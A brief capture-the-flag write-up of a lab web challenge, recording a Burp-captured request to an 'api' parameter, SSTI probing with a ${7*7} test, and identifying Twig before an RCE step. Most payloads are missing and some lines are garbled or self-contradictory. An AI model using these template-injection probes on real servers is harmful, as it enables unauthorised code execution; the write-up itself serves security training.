Obtain the flag
The page looked like having lots of functions, but they were dummies.
Examining the request with burp on, I found this:
POST / HTTP/1.1
Host: 94.237.53.146:35348
Content-Length: 45
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://94.237.53.146:35348
Referer: http://94.237.53.146:35348/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
api=http://truckapi.htb/?id%3DFusionExpress02
A post request to the endpoint api=http://truckapi.htb/id?%3DFusionExpress02
The server reseponse:
HTTP/1.1 200 OK
Date: Sun, 09 Mar 2025 09:02:07 GMT
Server: Apache/2.4.62 (Debian)
Content-Length: 55
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"id": "FusionExpress02", "location": "456 Oak Avenue"}
Looks like json data.
Since this module is about server side attacks, I inferred this endpoint could be vulnerable to SSTI.
Identification process below:
api=http://truckapi.htb/?id%3D${7*7}
NO
api=http://truckapi.htb/?id%3D
YES
api=http://truckapi.htb/?id%3D
YES
So it’s either Jinja2 or Twig.
Tried this payload:
This didn’t return anything.
This returned "__string_template__0177c07c1ce875b2c81f5871e3da1c28" so it’s Twig.
Sent this RCE payload:
Needed to url encode it (I deleted unnecessary spaces):
For space, %20 didn’t work so I used %20 (it’s +).
This assessment was rather simple.